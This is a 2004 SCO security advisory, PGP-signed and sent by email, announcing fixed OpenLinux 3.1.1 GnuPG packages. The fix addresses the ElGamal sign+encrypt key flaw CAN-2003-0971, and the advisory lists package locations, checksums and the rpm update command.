Date: Tue, 2 Mar 2004 18:57:01 -0800 (PST)
From: [email protected]
To: [email protected], [email protected],
Subject: OpenLinux: Gnupg (gpg) severe bug could compromise almost all ElGamal keys
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
______________________________________________________________________________
SCO Security Advisory
Subject: OpenLinux: Gnupg (gpg) severe bug could compromise almost all ElGamal keys
Advisory number: CSSA-2004-009.0
Issue date: 2004 March 02
Cross reference: sr888900 fz528657 erg712525 CAN-2003-0971
______________________________________________________________________________
1. Problem Description
GnuPG (GPG) 1.0.2, and other versions up to 1.2.3, creates ElGamal
sign+encrypt keys using the same key component for encryption as
for signing, which allows attackers to determine the private key
from a signature.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CAN-2003-0971 to this issue.
2. Vulnerable Supported Versions
System Package
----------------------------------------------------------------------
OpenLinux 3.1.1 Server prior to gnupg-1.2.2-2.i386.rpm
OpenLinux 3.1.1 Workstation prior to gnupg-1.2.2-2.i386.rpm
3. Solution
The proper solution is to install the latest packages. Many
customers find it easier to use the Caldera System Updater, called
cupdate (or kcupdate under the KDE environment), to update these
packages rather than downloading and installing them by hand.
4. OpenLinux 3.1.1 Server
4.1 Package Location
ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Server/CSSA-2004-009.0/RPMS
4.2 Packages
168ed23b56488785d45e861aaef4b3cc gnupg-1.2.2-2.i386.rpm
4.3 Installation
rpm -Fvh gnupg-1.2.2-2.i386.rpm
4.4 Source Package Location
ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Server/CSSA-2004-009.0/SRPMS
4.5 Source Packages
1713a8818339c43ecd988be7015ae677 gnupg-1.2.2-2.src.rpm
5. OpenLinux 3.1.1 Workstation
5.1 Package Location
ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Workstation/CSSA-2004-009.0/RPMS
5.2 Packages
90a18da7cdd7247cf601e8bbef66c1e7 gnupg-1.2.2-2.i386.rpm
5.3 Installation
rpm -Fvh gnupg-1.2.2-2.i386.rpm
5.4 Source Package Location
ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Workstation/CSSA-2004-009.0/SRPMS
5.5 Source Packages
2fad8d8f3cad20a62fac0e9eb39e283b gnupg-1.2.2-2.src.rpm
6. References
Specific references for this advisory:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0971
SCO security resources:
http://www.sco.com/support/security/index.html
This security fix closes SCO incidents sr888900 fz528657
erg712525.
7. Disclaimer
SCO is not responsible for the misuse of any of the information
we provide on this website and/or through our security
advisories. Our advisories are a service to our customers intended
to promote secure installation and use of SCO products.
8. Acknowledgements
SCO would like to thank Phong Nguyen
______________________________________________________________________________
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (SCO/UNIX_SVR5)
iD8DBQFARUhwbluZssSXDTERAjEkAKDo9I+3dH8mV+mcFxcm+Mf1UN3iNgCbB156
icQE3x3fX7Js8k2osQgRweM=
=hl26
-----END PGP SIGNATURE-----
